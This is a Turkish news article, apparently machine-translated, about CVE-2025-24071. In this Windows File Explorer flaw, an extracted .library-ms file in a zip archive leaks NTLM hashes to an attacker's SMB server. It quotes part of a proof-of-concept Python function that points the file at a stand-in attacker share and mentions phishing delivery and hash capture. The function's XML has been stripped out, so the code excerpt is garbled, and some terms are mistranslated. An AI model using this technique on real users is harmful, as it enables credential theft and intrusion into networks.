Windows 11 Dosya Gezgini Güvenlik Açığı NTLM Hash hırsızlığı sağlar

Windows Dosya Gezgini’nde yeni açıklanan bir güvenlik açığı olan CVE-2025-24071, özellikle Windows 11 (23H2) ve .library-MS dosyalarını ve KOBİ protokolünü destekleyen önceki sürümleri etkileyen tanımlanmıştır.

Bu kusur, saldırganların NTLM (yeni teknoloji LAN yöneticisi) kimlik doğrulama karmalarını sadece bir kullanıcıyı kötü niyetli bir zip arşivi çıkarmaya kandırarak yakalamasını sağlar – daha fazla etkileşim gerekmez.

Güvenlik açığı, Windows Gezgini’nin otomatik dosya işlemesini kullanır.

– Reklamcılık –

Özel olarak hazırlanmış bir zip veya rar arşivi .library-ms Dosya çıkarılır, Windows Gezgini ve SearchProtocolhost.exe Hizmeti, meta veri toplamak için dosyayı otomatik olarak ayrıştırır.

Eğer .library-ms Dosya Referanslar Saldırgan tarafından kontrol edilen uzak KOBİ (Sunucu Mesaj Bloğu) Yolu (örn., \\attacker_ip\shared), Windows bu sunucuya bir SMB kimlik doğrulama el sıkışma başlatır.

Bu el sıkışma, kurbanın NTLMV2 karmasını iletir, bu da daha sonra saldırgan tarafından kesilebilir ve potansiyel olarak çevrimdışı olabilir.

Teknik terimler ve bileşenler:

• Ntlm karma: Challenge-yanıt kimlik doğrulamasında kullanılan bir Windows kullanıcısının şifresinin kriptografik gösterimi.
• .Library-MS Dosyası: Windows tarafından sanal kütüphaneleri veya klasör koleksiyonlarını tanımlamak için kullanılan bir XML tabanlı dosya türü.
• SMB Protokolü: Bir ağ üzerinden dosyalara ve yazıcılara erişmek için Windows tarafından kullanılan bir ağ dosyası paylaşım protokolü.
• Bilgi Açıklama: Güvenlik açığı türü, hassas kimlik doğrulama verilerini sızdırıyor.

Konsept ve saldırı kodu kanıtı

Güvenlik araştırmacısı Mohammed Idrees Banyamer, saldırıyı gösteren bir kavram kanıtı (POC) yayınladı.

Python komut dosyası, kötü niyetli bir .library-ms Dosya, saldırgan kontrollü bir SMB sunucusuna referans eklemek.

Komut dosyası daha sonra bu dosyayı bir zip arşivine paketler.

Bir kurban arşivi çıkardığında, sistemleri otomatik olarak saldırganın SMB sunucusuyla kimlik doğrulamaya çalışır ve NTLM karma sızdırmaz.

Anahtar Kodu Alıntı:

pythondef create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:
    payload = f'''

  
    
      
        \\\\{ip}\\shared
      
    
  
'''
    output_file = output_dir / f"{filename}.library-ms"
    output_file.write_text(payload, encoding="utf-8")
    return output_file

Saldırganlar bu komut dosyasını ZIP dosyasını oluşturmak ve daha sonra kimlik avı e -postaları veya kötü amaçlı indirmeler aracılığıyla dağıtmak için kullanabilir.

Müdahale gibi araçlar, kurban arşivi çıkardıktan sonra NTLM karmalarını dinlemek ve yakalamak için kullanılabilir.

Gerçek dünyadaki etki, sömürü ve hafifletme

Güvenlik açığı, hükümet ve özel sektör kuruluşlarını hedefleyen kampanyalar ile vahşi doğada aktif olarak sömürüldü.

Saldırganlar, kimlik avı e -postaları, Dropbox bağlantıları ve yeraltı forumları aracılığıyla kötü amaçlı zip arşivleri dağıttılar.

Özellikle, “Krypt0n” tehdit oyuncusu, bu kusurdan yararlanan kötü amaçlı yazılımların geliştirilmesi ve satışı ile bağlantılıdır.

Riskler şunları içerir:

• Saldırı saldırıları için kimlik kimlik hırsızlığı
• Ağlar içinde yanal hareket potansiyeli
• NTLM karmalarının çevrimdışı çatlaması

Microsoft, Mart 2025 Patch Salı güncellemesindeki güvenlik açığını ele aldı ve tüm kullanıcıları en son güvenlik yamalarını hemen uygulamaya çağırdı.

Ayrıca, kuruluşların mümkünse NTLM kimlik doğrulamasını kısıtlamaları veya devre dışı bırakmaları, SMB imzalamasını etkinleştirmeleri ve şüpheli KOBİ trafiğini izlemeleri önerilir.

Özet Tablo:

Bu olay, eski kimlik doğrulama protokollerinin ortaya koyduğu riskleri vurgulamaktadır ve kurumsal ortamlarda hızlı yama ve katmanlı güvenlik kontrollerinin önemini vurgulamaktadır.

Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!